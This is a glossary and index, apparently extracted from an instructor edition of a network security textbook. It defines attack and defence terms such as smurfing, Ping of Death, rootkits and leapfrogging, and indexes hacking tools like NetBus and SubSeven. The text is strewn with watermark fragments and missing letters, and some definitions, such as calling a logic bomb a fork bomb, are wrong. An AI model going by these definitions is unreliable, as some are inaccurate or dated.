IP spoofing An attack whereby a system attempts to illicitly impersonate another system by using IP network address. IW (Information Warfare) Information Operations conducted during a time of crisis or conict to achieve or promote specic objectives over a specic adversary or adversaries. (DODD S-3600.1 of 9 Dec 1996) leapfrog attack Use of user ID and password information obtained illicitly from one host to compromise another host. The act of TELNETing through one or more hosts in order to preclude a trace (a standard cracker procedure). letterbomb A piece of email containing live data intended to do malicious things to the recipients machine or terminal. Under UNIX, a letterbomb can also try to get part of its contents interpreted as a shell command to the mailer. The results of this could range from amusing to denial of service. Logic Bomb Also known as a Fork Bomb. A resident computer program which, when executed, checks for a particular condition or particular state of the system which, when satised, triggers the perpetration of an unauthorized act. mailbomb The mail sent to urge others to send massive amounts of email to a single system or person, with the intent to crash the recipients system. malicious code Hardware, software, or rmware that is intentionally included in a system for an unauthorized purpose (for example, a Trojan Horse). metric A random variable x representing a quantitative measure accumulated over a period. mimicking Synonymous with impersonation, masquerading, or spoong.
key A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt. key escrow The system of giving a piece of a key to each of a certain number of trustees such that the key can be recovered with the collaboration of all the trustees.
Ed
T DU
or
DO NO
556
In
st
ru ct
keystroke monitoring A specialized form of audit trail software, or a specially designed device, that records every key struck by a user and every character of the response that the AIS returns to a user system. LAN (Local Area Network) A computer communications system limited to no more than a few miles and using high-speed connections (2 to 100 megabits per second). A short-haul communications system that connects ADP devices in a building or group of buildings within a few square kilometers, including workstations, frontend processors, controllers, and servers.
PL
IC
AT
iti
on
GLOSSARY
Misuse Detection Model The system detects intrusions by looking for activity that corresponds to known intrusion techniques or system vulnerabilities. Also known as rules based detection. mockingbird A computer program or process that mimics the legitimate behavior of a normal system feature (or other apparently useful function) but performs malicious activities once invoked by the user. Multihost Based Auditing Audit data from multiple hosts may be used to detect intrusions or misuse. nack attack Negative acknowledgment. A penetration technique which capitalizes on a potential weakness in an operating system that does not handle asynchronous interrupts properly, leaving the system in an unprotected state during such an attack. NCSC (National Computer Security Center) Originally named the DoD Computer Security Center, the NCSC is responsible for encouraging the widespread availability of trusted computer systems throughout the Federal Government. (AF9K_JBC.TXT) (NCSC) With the signing of NSDD-145; the NCSC is responsible for encouraging the widespread availability of trusted computer systems throughout the Federal Government. network level firewall A rewall in which traffic is examined at the network protocol (IP) packet level.
or
DO NO
network weaving Another name for leapfrogging.
network based Network traffic data along with audit data from the hosts used to detect intrusions.
In
network Two or more machines interconnected for communications.
st
NII (National Information Infrastructure) The nationwide interconnection of communications networks, computers, databases, and consumer electronics that makes vast amounts of information available to users. The NII encompasses a wide range of equipment, including cameras, scanners, keyboards, facsimile machines, computers, switches, compact disks, video and audio tape, cable, wire, satellites, ber optic transmission lines, networks of all types, monitors, printers, and much more. The friendly and adversary personnel who make decisions and handle the transmitted information constitute a critical component of the NII. (Pending approval in JP 1-02) .
ru ct
DU
PL
IC
AT
Glossary 557
network security officer Individual formally appointed by a designated approving authority to ensure that the provisions of all applicable directives are implemented throughout the life cycle of an automated information system network.
Ed
network security Protection of networks and their services from unauthorized modication, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.
iti
on
GLOSSARY
non-discretionary security The aspect of DOD security policy which restricts access on the basis of security levels. A security level is composed of a read-level and a category-set restriction. For read access to an item of information, a user must have a clearance level greater than or equal to the classication of the information and also have a category clearance, which includes all of the access categories specied for the policy. non-repudiation Method by which the sender of data is provided with proof of delivery and the recipient is assured of the senders identity so that neither can later deny having processed the data. operations security Denition 1) The process of denying adversaries information about friendly capabilities and intentions by identifying, controlling, and protecting indicators associated with planning and conducting military operations and other activities. Denition 2) An analytical process by which the US Government and its supporting contractors can deny to potential adversaries information about capabilities and intentions by identifying, controlling, and protecting evidence of the planning and execution of sensitive activities. OPSEC (Operations Security) A process of identifying critical information and subsequently analyzing friendly actions attendant to military operations and other activities to a. identify those actions that can be observed by adversary intelligence systems, b. determine indicators hostile intelligence systems might obtain that could be interpreted or pieced together to derive critical information in time to be useful to adversaries, and c. select and execute measures that eliminate or reduce to an acceptable level the vulnerabilities of friendly actions. Orange Book See Trusted Computer Security Evaluation Criteria. OSI (Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components. packet A block of data sent over the network transmitting the identities of the sending and receiving stations, error-control information, and message.
Ed
T DU
or
DO NO
558
In
st
ru ct
open systems security Provision of tools for the secure internetworking of open systems.
operational data security The protection of data from either accidental or unauthorized, intentional modication, destruction, or disclosure during input, processing, or output operations.
PL
open security Environment that does not provide environment-sufficient assurance that applications and equipment are protected against the introduction of malicious logic prior to or during the operation of a system.
IC
AT
iti
on
GLOSSARY
packet filter Inspects each packet for user dened content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of rewall. packet filtering A feature incorporated into routers and bridges to limit the ow of information based on pre-determined communications such as source, destination, or type of service being provided by the network. Packet lters let the administrator limit protocol specic traffic to one network segment, isolate email domains, and perform many other functions. packet sniffer A device or program that monitors the data travelling between computers on a network. passive attack Attack which does not result in an unauthorized state change, such as an attack that only monitors and/or records data. passive threat The threat of unauthorized disclosure of information without changing the state of the system. A type of threat that involves the interception, not the alteration, of information. penetration testing The portion of security testing in which the evaluators attempt to circumvent the security features of a system. The evaluators may be assumed to use all system design and implementation documentation, that may include listings of system source code, manuals, and circuit diagrams. perimeter based security The technique of securing a network by controlling access to all entry and exit points of the network. Usually associated with rewalls and/or lters.
or
DO NO
ru ct
PGP (Pretty Good Privacy) A freeware program primarily for secure electronic mail. phage A program that modies other programs or databases in unauthorized ways; especially one that propagates a virus or Trojan horse. PHF Phone book le demonstration program that hackers use to gain access to a computer system and potentially read and capture password les. PHF hack A well-known and vulnerable CGI script which does not lter out special characters (such as a new line) input by a user.
PEM (Privacy Enhanced Mail) An IETF standard for secure electronic mail exchange. penetration The successful unauthorized access to an automated system.
penetration signature The description of a situation or set of conditions in which a penetration or system events could occur which in conjunction can indicate the occurrence of a penetration in a system.
In
st
DU
PL
personnel security The procedures established to ensure that all personnel who have access to any classied information have the required authorizations as well as the appropriate clearances.
IC
AT
Glossary 559
perpetrator The entity from the external environment that is taken to be the cause of a risk. An entity in the external environment that performs an attack, such as a hacker.
Ed
iti
on
GLOSSARY
phracker An individual who combines phone phreaking with computer hacking. phreak(er) An individual fascinated by the telephone system. Commonly, an individual who uses his knowledge of the telephone system to make calls at the expense of another. phreaking The art and science of cracking the phone network. promiscuous mode Normally an Ethernet interface reads all address information and accepts follow-on packets only destined for itself, but when the interface is in promiscuous mode, it reads all information (sniffer), regardless of its destination. protocol Agreed-upon methods of communications used by computers. A specication that describes the rules and procedures that products should follow to perform activities on a network, such as transmitting data. If they use the same protocols, products from different vendors should be able to communicate on the same network. prowler A daemon that is run periodically to seek out and erase core les, truncate administrative log les, nuke lost-and-found directories, and otherwise clean up. proxy A rewall mechanism that replaces the IP address of a host on the internal (protected) network with its own IP address for all traffic passing through it. A software agent that acts on behalf of a user; typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps does additional authentication, and then completes a connection on behalf of the user to a remote destination. PSYOP (Psychological Operations) Planned operations to convey selected information and indicators to foreign audiences to inuence their emotions, motives, objective reasoning, and ultimately the behavior of foreign governments, organizations, groups, and individuals. The purpose of psychological operations is to induce or reinforce foreign attitudes and behavior favorable to the originators objectives.
physical security The measures used to provide physical protection of resources against deliberate and accidental threats. piggy back The gaining of unauthorized access to a system via another users legitimate connection.
Ed
T DU
or
DO NO
560
In
st
ru ct
plaintext Unencrypted data. procedural security See Administrative Security.
Private Key Cryptography An encryption methodology in which the encryptor and decryptor use the same key, which must be kept secret. This methodology is usually only used by a small group. probe Any effort to gather information about a machine or its users for the apparent purpose of gaining unauthorized access to the system at a later date.
profile Patterns of a users activity which can detect changes in normal routines.
PL
Ping of Death The use of Ping with a packet size higher than 65,507. This will cause a denial of service.
IC
AT
iti
on
GLOSSARY
Public Key Cryptography Type of cryptography in which the encryption process is publicly available and unprotected, but in which a part of the decryption key is protected so that only a party with knowledge of both parts of the decryption process can fully communicate. Red Book See Trusted Network Interpretation. reference monitor A security control concept in which an abstract machine mediates accesses to objects by subjects. In principle, a reference monitor should be complete (in that it mediates every access), isolated from modication by system entities, and veriable. A security kernel is an implementation of a reference monitor for a given hardware base. replicator Any program that acts to produce copies of itself; examples include a program, worm, fork bomb, or virus. It is even claimed by some that UNIX and C are the symbiotic halves of an extremely successful replicator. retro-virus A retro-virus is a virus that waits until all possible backup media are infected too, so that it is not possible to restore the system to an uninfected state. risk assessment A study of vulnerabilities, threats, likelihood, loss or impact, and theoretical effectiveness of security measures. The process of evaluating threats and vulnerabilities, known and postulated, to determine expected loss and establish the degree of acceptability to system operations. risk management The total process to identify, control, and minimize the impact of uncertain events. The objective of the risk management program is to reduce risk and obtain and maintain DAA (Designated Approving Authority) approval.
Ed
T DU
st
rexd This Unix command is the Sun RPC server for remote program execution. This daemon is started by inetd whenever a remote execution request is made.
RSA Algorithm RSA stands for Rivest-Shamir-Aldeman. A public-key cryptographic algorithm that hinges on the assumption that the factoring of the product of two large primes is difficult.
In
DO
ru ct
rootkit A hacker security tool that captures passwords and message traffic to and from a computer. A collection of tools that allows a hacker to provide a back door into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkit is a classic example of Trojan Horse software. Rootkit is available for a wide range of operating systems.
or
NO
router An interconnection device that is similar to a bridge but serves packets or frames containing certain protocols. Routers link LANs at the Network Layer. routing control The application of rules during the process of routing so as to choose or avoid specic networks, links, or relays.
PL
IC
AT
Glossary 561
iti
on
GLOSSARY
Rules Based Detection The intrusion detection system detects intrusions by looking for activity that corresponds to known intrusion techniques (signatures) or system vulnerabilities. Also known as Misuse Detection. samurai A hacker who hires out for legal cracking jobs, snooping for factions in corporate political ghts, lawyers pursuing privacyrights and First Amendment cases, and other parties with legitimate reasons to need an electronic locksmith. security countermeasures Countermeasures that are aimed at specic threats and vulnerabilities or involve more active techniques as well as activities traditionally perceived as security.
or
DO NO
ru ct st
secure shell A completely encrypted shell connection between two machines protected by a super long pass-phrase. security A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or inuences. security architecture A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements. security audit A search through a computer system for security problems and vulnerabilities.
In
DU
security label Piece of information that represents the sensitivity of a subject or object, such as its hierarchical classication (CONFIDENTIAL, SECRET, TOP SECRET) together with any applicable non-hierarchical security categories (such as sensitive compartmented information or critical nuclear weapon design information). security level The combination of a hierarchical classication and a set of non-hierarchical categories that represents the sensitivity of information.
PL
secure network server A device that acts as a gateway between a protected enclave and the outside world.
security kernel The hardware, rmware, and software elements of a Trusted Computing Base that implement the reference monitor concept. It must mediate all accesses, be protected from modication, and be veriable as correct.
IC
AT
SATAN (Security Administrator Tool for Analyzing Networks) A tool for remotely probing and identifying the vulnerabilities of systems on IP networks. A powerful freeware program which helps to identify system security weaknesses.
Ed
security features The security-relevant functions, mechanisms, and characteristics of AIS hardware and software. security incident Any act or circumstance that involves classied information that deviates from the requirements of governing security publications. For example, compromise, possible compromise, inadvertent disclosure, and deviation.
iti
security domains The sets of objects that a subject has the ability to access.
on
GLOSSARY
security officer The ADP official having the designated responsibility for the security of an ADP system. security perimeter The boundary where security controls are in effect to protect assets. security policies The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information. security policy model A formal presentation of the security policy enforced by the system. It must identify the set of rules and practices that regulate how a system manages, protects, and distributes sensitive information. security requirements Types and levels of protection necessary for equipment, data, information, applications, and facilities. security service A service, provided by a layer of communicating open systems, which ensures adequate security of the systems or of data transfers. Signaling System 7 (SS-7) A protocol used by phone companies. Has three basic functions: supervising, alerting, and addressing. Supervising monitors the status of a line or circuit to see if it is busy, idle, or requesting service. Alerting indicates the arrival of an incoming call. Addressing is the transmission of routing and destination signals over the network in the form of dial tone or data pulses.
or
DO NO
ru ct
st
security violation An instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information contained therein or to the system itself. server A system that provides network service such as disk storage and le transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.
snarf To grab a large document or le for the purpose of using it with or without the authors permission. sneaker An individual hired to break into places in order to test their security; analogous to tiger team.
In
smurfing A denial of service attack in which an attacker spoofs the source address of an echo-request ICMP (ping) packet to the broadcast address for a network, causing the machines in the network to respond en masse to the victim.
DU
PL
IC
Glossary 563
skipjack An NSA-developed encryption algorithm for the Clipper chip. The details of the algorithm are unpublished.
AT
SIO (Special Information Operations) Information Operations that, by their sensitive nature, due to their potential effect or impact, security requirements, or risk to the national security of the United States, require a special review and approval process. (DODD S-3600.1 of 9 Dec 96)
Ed
iti
on
GLOSSARY
sniffer A program to capture data across a computer network. Used by hackers to capture user ID names and passwords. Software tool that audits and identies network trafc packets. Is also used legitimately by network operations and maintenance personnel to troubleshoot network problems. SNMP (Simple Network Management Protocol) Software used to control network communications devices using TCP/IP. TCB (Trusted Computing Base) The totality of protection mechanisms within a computer system including hardware, rmware, and software, the combination of which are responsible for enforcing a security policy. A TCB consists of one or more components that together enforce a unied security policy. TCP wrapper A software tool for security which provides additional network logging, and restricts service access to authorized hosts by service. TCP/IP (Transmission Control Protocol/ Internetwork Protocol) The suite of protocols on which the Internet is based. TCSEC (Trusted Computer System Evaluation Criteria) A system that employs sufficient hardware and software assurance measures to allow its use for simultaneous processing of a range of sensitive or important data issues. Term Rule-Based Security Policy A security policy based on global rules imposed for all users. These rules usually rely on a comparison of the sensitivity of the resources being accessed and the possession of corresponding attributes of users, a group of users, or entities acting on behalf of users. terminal hijacking Allows an attacker, on a certain machine, to control any terminal session that is in progress. An attack hacker can send and receive terminal I/O while a user is on the terminal.
ru ct st
In
subversion Occurs when an intruder modies the operation of the intrusion detector to force false negatives to occur. SYN Flood When the SYN queue is ooded, no new connection can be opened.
DO
SSL (Secure Sockets Layer) A session layer protocol that provides authentication and condentiality to applications.
NO
spoofing Pretending to be someone else. The deliberate inducement of a user or a resource to take an incorrect action. Attempt to gain access to an AIS by pretending to be an authorized user. Impersonating, masquerading, and mimicking are forms of spoong.
DU
PL
SPI (Secure Prole Inspector) A network monitoring tool for UNIX, developed by the Department of Energy.
or
IC
AT
spam To crash a program by overrunning a xed-site buffer with excessively large input data. Also, to cause a person or newsgroup to be ooded with irrelevant or inappropriate messages.
Ed
iti
on
GLOSSARY
threat The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security. threat agent Methods and things used to exploit a vulnerability in an information system, operation, or facility; re, natural disaster and so forth. threat assessment Process of formally evaluating the degree of threat to an information system and describing the nature of the threat. tiger A software tool which scans for system weaknesses. tiger team Government- or industry-sponsored team of computer experts who attempt to break down the defenses of computer systems in an effort to uncover, and eventually repair, holes in the security. traceroute An operation of sending trace packets for determining information; traces the route of UDP packets for the local host to a remote host. Normally traceroute displays the time and location of the route taken to reach its destination. tranquillity A security model rule stating that the security level of an active object cannot change during the period of activity. tripwire A software tool for security. Basically, it works with a database that maintains information about the byte count of les. If the byte count has changed, it will identify it to the system security manager.
Ed
T DU
or
DO NO
tinkerbell program A monitoring program used to scan incoming network connections and generate alerts when calls are received from particular sites, or when logins are attempted. topology The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information ows.
st
trace packet In a packet-switching network, a unique packet that causes a report of each stage of its progress to be sent to the network control center from each visited system element.
In
ru ct
Trusted Network Interpretation The specic security features, assurance requirements, and rating structure of the Orange Book as extended to networks of computers ranging from isolated LANs to enterprise level. TTY watcher A hacker tool that allows hackers with even a small amount of skill to hijack terminals. It has a GUI interface. vaccine Program that injects itself into an executable program to perform a signature check and warns if there have been any infections. virus A program that can infect other programs by modifying them to include a possibly evolved copy of itself.
PL
Trojan Horse An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsication, or destruction of data.
IC
AT
Glossary 565
iti
on
GLOSSARY
vulnerability Hardware, rmware, or software ow that leaves an AIS open for potential exploitation. A weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS. vulnerability analysis Systematic examination of an AIS or product to determine the adequacy of security measures, identify security deciencies, provide data from which to predict the effectiveness of proposed security measures, and conrm the adequacy of such measures after implementation. WAIS (Wide Area Information Service) An Internet service that allows you to search a large number of specially indexed databases.
Ed
T DU PL IC
st
worm Independent program that replicates from machine to machine across network connections often clogging networks and information systems as it spreads.
566
In
DO
ru ct
war dialer A program that dials a given list or range of numbers and records those which answer with handshake tones, which might be entry points to computer or telecommunications
NO
WAN (Wide Area Network) A physical or logical network that provides capabilities for a number of independent devices to communicate with each other over a common transmission-interconnected topology in geographic areas larger than those served by local area networks.
or
AT
iti
on
INDEX
6-over-4 interface, 66-67
A
access gaining, 535-537 access control, 183-187 Web server, 449-450 Access Control List See: ACL acknowledgement numbers, 17 ACL, 237-240 anti-DoS, 367 anti-Land, 368 anti-spoong, 368-369 anti-SYN, 367-368 command syntax, 363-364 creating, 359-360 defending against attacks, 367-369 extended syntax, 364-365 implementing, 363-367 logging, 374-376 operation, 360 Active Directory See: AD active open connection, 18-20 AD, 237-241 auditing, 285-286 structure, 237-240, 241 administrative access, 258-259 administrative distance, 349-350 administrator account, 255-257 AH combine with ESP in IPSec, 117-119 conguring, 98-99 Transport mode, 80 Tunnel mode, 80 AH and ESP in IPSec, 117-119 mismatched policies, 124-125 requiring in IPSec, 122-124 response policy, 127-128 session analysis, 120-122 alert, 216-218 anti-spoong logging, 374
back door, 483-484 backup adding data, 405 Cisco routers, 417-419 for Linux, 415-417 hardware, 394-395 incremental, 408-409 initiating, 399-400 options, 395-398 OSs, 391-398 plan, 380 policy, 384 products, 416-417 strategies, 398-399 viewing results, 400-401 week work, 404 weekend work, 402-403 banners, 327-328 basics, 12-13 Bastille, 229-232 using, 230 Berkley Internet Name Domain See: BIND binary conversion, 7-8 BIND, 430-432 binding, 191-193 block inheritance, 260 breach, 169-172 broadcast, 14-15
Ed
T DU
Apache, 454 ARP process, 334-336 attack, 182-183 hiding evidence, 538 hiding les, 538 OOB, 539 auditing, 276-277, 283-285 authentication, 64-66, 80, 132-134, 325 Authentication Header, 64-66 authentication methods, 246-249 editing policies, 95-96 authorization, 325 availability, 386
or
DO NO
In
st
ru ct
PL
IC
Index
AT
567
iti
on
INDEX
browser security, 461-462 browsers personal information, 476 buffer overow, 443-444 buffered logging, 372 bug, 322 console logging, 371 console password, 325 content rating, 473-474 using, 474-475 contingency plan, 384-385 creating, 385 testing, 385-386 cookies, 460, 473 CORE, 425-426 corrupt data, 412 Council of Registrars See: CORE cracking, 173-174 crash, 203-210 cryptography, 79
C
cable modem vulnerabilities, 460-461 captures displaying, 24-25 CDP, 354-355 certicates, 132-134, 475-476 CGI, 441 Challenge Response authentication, 250 chmod command, 165 CIDR, 13-14 Cisco backup for routers, 417-419 banners, 328-329 logging, 370 OS, 322 router language, 322 Cisco Discovery Protocol See: CDP Classless Interdomain Routing See: CIDR Client policy, 83-84 commands chmod, 165 ipsec6.exe, 69-70 ipv6.exe, 69 ping6.exe, 70-71 umask, 171 Common Gateway Interface See: CGI compromise, 229 condentiality, 64-66 conguration fragments, 324 connection, 18-20 establishing, 18-19 terminating, 19-20 connections TCP, 33-34
Ed
D
DARPA, 194-196 Data Encryption Standard See: DES data recovery, 297 DDoS, 431 dead gateway, 314-315 decimal conversion, 7-8 Default Response, 96-98 defaultless core routers, 429 Defense Advanced Research Projects Agency See: DARPA denial of host, 365 denial of network, 366 Denial of Service, 314-316 denial of subnet, 366 DES, 84-85 dialup client, 307-308, 312-313 dialup server, 305-306, 311-312 differential backup, 402 restoring data, 406-408 directory permission, 162-166 disabling services, 280-281 disaster recovery, 380-382, 406 distance vector routing, 347 Distributed Denial of Service See: DDoS DNS, 241-242, 426-428
or
DO NO
ru ct
568
In
st
DU
PL
IC
AT
iti
on
INDEX
for Windows 2000, 433-434 installing, 436-437 security, 432-433 spoong, 433 standard secondary server, 439-440 targeting, 430-432 domain tree, 237-240 DoS, 448-449 performing, 538-539 DSL vulnerabilities, 460-461 dynamic routing, 342-345 le attachment vulnerabilities, 458-459 le permissions, 162-166, 272-274 le structure, 155 lter list, 129-132 nger, 357 rewall, 80 folder permissions, 272-274 Forward Lookup Zone, 435-436 conguring, 437-438 fping/gping tool, 492-493 FTP capture, 46-48 conguring, 99-100 granting, 366-367 session analysis, 49 full-scale environment simulation, 386
E
EFS, 296-298 and users, 297 cryptography, 297-298 email hack attacks, 455-459 message source, 486-487 security, 477-478 enable password, 326 Encapsulating Security Payload See: ESP ESP, 64-66 analysis, 114 combine with AH in IPSec, 117-119 encryption, 108-110 Transport mode, 80 Tunnel mode, 80 ESP IPSec session, 113 Ethereal, 28-29 GUI, 29-33 Ethernet interfaces, 67 event les clearing, 538 Event IDs, 291 event logs, 294-295 Event Viewer, 295 managing, 288-290 executables securing, 281-283
Ed
T DU
or
DO NO
F
fault tolerance, 426-428
gaining access, 535-537 gaining rights, 536 generator, 389-391 fuel types, 391 implementing, 391 GNOME, 139, 140-142 GNU Network Object Model Environment See: GNOME Gold Standard, 253 analyzing, 269-271 implementing, 268-269 GPO, 242 editing, 243-244 enforcing, 244-245 graphical tracing tool, 489-490 group policy, 242, 259-260 implementing, 242-243 Group Policy Object See: GPO groups accounts, 146-151 adding, 148-150 security, 253 standard, 147-148 Windows 2000, 254-255 GRUB loader, 537
In
st
ru ct
PL
IC
AT
Index 569
iti
on
INDEX
H
hacker, 183-187 hacking, 428 hardware backup options, 394-395 hexadecimal conversion, 7-8 High security setting, 469-471 host, 3-6 host based access, 184-186 hot xes, 451-452 checker, 452-453 HTML email attacks, 455-457 Internet Engineering Steering Group See: IESG Internet Engineering Task Force See: IETF Internet Explorer 6 advanced settings, 464-466 default settings, 467-468 security settings, 466-467 settings, 462-464 Internet Information Server See: IIS Internet Protocol See: IP Internet Service Provider See: ISP Internet Society See: ISOC intrusion, 216-223 intrusion detection, 296 IP, 7-9 address classes, 8-9 bind addresses, 191-193 datagram, 35-38 private addresses, 9 redirect addresses, 191-193 security, 78-79 special-function addresses, 9 IPSec AH implementation, 89 conguring a response, 119-120 conguring options, 125-127 custom policies, 90-94 disabling, 134-135 full session, 128-129 implementing, 80-81, 100-101 modes, 79-80 policies, 83-84 ipsec6.exe command, 69-70 IPv6 addresses, 62-63 basics, 62 installing, 64-66 interfaces, 66-68 security, 64-66
IAB, 425-426 IANA, 425-426 IAS, 309-310 ICANN, 425-426 ICMP, 355-356 direct broadcast, 355 session analysis, 46 unreachable, 355-356 ICMP messages, 38-40 ICS, 303 IESG, 425-426 IETF, 425-426 IIS, 445-446 incremental backup, 408-409, 410-411 incomplete restore, 413-415 restoring data, 413 incremental restore, 415 inheritance, 274 inodes, 154 integrity, 35-38 Internet Architecture Board See: IAB Internet Assigned Numbers Authority See: IANA Internet components, 422 Internet Connection Sharing See: ICS Internet Corporation for Assigned Names and Numbers See: ICANN
Ed
T DU
or
DO NO
570
In
st
ru ct
PL
IC
AT
iti
on
INDEX
traffic, 71-72 utilities, 68-69 x-cast, 63 ipv6.exe command, 69 ISOC, 425-426 ISP, 424 targeting, 430 security, 162 system information, 158-162 traceroute, 489 Lion worm, 430 LM authentication, 247-248 Local Area Network See: LAN local security policy, 260-261 log les managing, 295-296 log priority, 370-371 log viewer, 228-229 logging, 224-226, 283-285, 369-371 ACL, 374-376 anti-spoong, 374 authentication, 291-294 buffered, 372 clearing, 538 conguring, 371-373 console, 371 last log, 225-226 lastlog, 224-225 secure log, 227 syslog, 372-373 terminal, 372 VTY, 375 Web server, 227 xferlog, 227 long distance carriers, 423 Low security setting, 468-469
J
John the Ripper, 527-528
K
K Desktop Environment See: KDE KDE, 139, 140-142 Kerberos, 251-252 kernel, 139 keys, 79 keystrokes logging, 521-522 recording, 520-521
Ed
T DU
or
DO
L0pht, 523-527 LC4, 524-526 LAN, 86-89 LAN-to-LAN routing, 337 LAN-to-WAN routing, 338-340 last log le, 225-226 lastlog log le, 224-225 limited environment simulation, 386 link state routing, 348-349 Linux administration, 138-139 backup options, 415-417 common commands, 143-145 disks, 152-153 le system, 151-156 logging in, 140 navigation, 139-145 partitions, 152-153 ping sweep, 492-493 run levels, 213
In
st
ru ct
M
message source, 486-487 metric, 346-350 Microsoft Management Console See: MMC Microsoft Virtual Machine See: Microsoft VM Microsoft VM, 471-472 mismatched IPSec policies, 105-106 session analysis, 106-107 mismatched policies AH and ESP, 124-125
NO
PL
IC
Index
AT
571
iti
on
INDEX
MMC, 81-83 customized conguration, 84 mounting devices, 153-154 MTU restrictions, 315 multicast, 14-15, 63 OS detection, 505-506 no override, 259 NSP, 423 NTLM authentication, 248-249 NTLMv2, 249 NULL session, 275
NAP, 423-424 NAT, 303 Nessus, 507-510 vulnerability scan, 510-511 NetBIOS, 301-302 NetBus, 514-516 1.7, 515 Pro, 515-516 Netcat, 519-520 netstat tool, 497 network, 3-4 Network Access Point See: NAP Network Address Translation See: NAT Network File System See: NFS Network Information Centers See: NIC Network Information Service See: NIS Network Monitor, 22-28 Display view, 24-25 lters, 25-27 network security, 488 Network Service Provider See: NSP network system gaining control, 519-520 NFS, 194-200 exports, 196-199 securing, 200-202 server, 194-196 NIC, 425-426 NIS, 202-203 nmap tool, 493 Front end, 506-507
ru ct
packet, 4-6 packet lter, 359-360 packet fragmentation, 44-45 packet sniffer, 460 PAM, 177-181 conguration les, 177 modules, 178-179 securing access, 180-181 security, 179-180 passive open connection, 18-20 passwords cracking, 523-527 managing, 176-177 recommendations, 261-262 revealing, 529-531 security, 172-176 patched, 451-452 penetration, 483-484
st
572
In
DO
NO
DU
PL
object auditing, 285-286 object ownership, 156 OOB attack, 539 Open Systems Interconnection See: OSI open-source software, 138-139 operating modes, 323 Organizational Units See: OU OS detecting, 502-505 OS backup, 391-398 OSI model, 4-6 OU, 237-240 Out Of Bounds attack See: OOB attack
Ed or
IC
AT
iti
on
INDEX
permissions assigning, 167 setting, 165 testing, 167-169 personal information, 476 phreaking, 483-484 physical security, 255-257 PID, 159 PING capture, 46-48 ping sweeps, 492-493 ping6.exe command, 70-71 Pinger tool, 493-494 plaintext, 79 Pluggable Authentication Modules See: PAM policy inheritance, 259 port scanning, 496-497 Windows, 499-502 ports, 20-22 privilege escalation, 535-536 probe, 430 Process Identier See: PID prole, 473-474 promiscuous mode, 28-29 propagation, 274 protocol, 3-6 proxy, 291-294 Request policy, 108-110 Request For Comments See: RFC Request-and-Respond policy, 102-103 session analysis, 103-104 Request-and-Response session analysis, 111-112 Request-only session analysis, 101-102 Require policy, 104-105 Require ESP IPSec policy, 114-115 Require ESP IPSec session, 115-117 Require response policy, 107-108 Respond only policy, 110-111 restoring les from backup, 401-402 the network, 313 restricting logon hours, 253-254 Revelation, 529-531 Reverse Lookup Zone, 434-435 conguring, 437-438 RFC, 6-7 rights gaining, 536 RIP, 310-311, 350-351 RIPv2, 351-353 risk analysis, 383 rootkit, 430 routed protocols, 345 router, 12-13 access passwords, 325-327 accessing, 323 banners, 327-328 navigating, 324-325 targeting, 429 user accounts, 327 routing, 12-13 process, 340-342 protocols, 345, 346-350
Ed
T DU
or
DO NO
RADIUS, 304-305 creating users, 308-309 dialup server, 311-312 RAID levels, 392-394 recovery policy, 384 Red Hat Network, 182 redirect, 191-193 registry auditing, 286-288 backup, 278-279 blocking access, 279-280 conguration, 277-278 remote access, 303-304 remove unneeded services, 358-359
In
st
ru ct
PL
IC
Index
AT
573
iti
on
INDEX
Routing Information Protocol See: RIP
S
SAM, 536-537 deleting, 536-537 renaming, 536-537 Samba, 203-210 conguration les, 204-206 maintaining, 206-207 uses, 204 scripting vulnerabilities, 457-458 secedit.exe utility, 267-268 secure log le, 227 Secure Server policy, 83-84, 86-89 Secure Shell See: SSH Secure Sockets Layer See: SSL security, 16-17 analysis snap-in, 265-266 browser, 461-462 custom templates, 264-265 DNS, 432-433 email, 477-478 errata, 182-183 le, 272 folder, 272 IIS, 445-446 in Windows 2000, 253 Internet Explorer 6, 466-467 IPv6, 64-66 Linux, 162 PAM, 179-180 password, 172-176 printer, 276 registry, 276-277 statup/shutdown, 210-211 templates, 262-264 updates, 182-183 Web server, 444 Web server directory, 449 Windows 2000 network, 298-301
Security Accounts Manager See: SAM security architecture, 246 security audit, 505-506 security level, 263-264 security policies, 83-84 sequence numbers, 17 server, 3-4 Server policy, 83-84 service identication, 497-498 services removing, 211-212 session teardown process, 34-35 SetGID, 169-172 SetUID, 169-172 shadow password le, 174-175 Simple Network Management Protocol See: SNMP simulated test, 385 small services, 357 smart cards, 252 smurng, 314-316 sniffer, 460 SNMP, 323 social engineering, 531-532 source routing, 356 spoong, 229-230 DNS, 433 SSH, 213-214, 330 client conguration, 333 router conguration, 330-333 using, 214-215 verication, 331-332 SSL, 246 stack detection, 503-505 Standard Secondary Server, 439-440 static routing, 342-345 Sticky Bit, 169-172 subnet mask, 10-12 subnetting, 10-12 SubSeven Trojan, 513-514 super block, 154 superdaemon, 187-194 SuperScan, 494-495
Ed or
DO NO T DU
574
In
st
ru ct
PL
IC
AT
iti
on
INDEX
Syn attack defense, 314 SYSKEY, 249-250 syslog logging, 372-373 system hardening, 280-283 system statup/shutdown security, 210-211
T
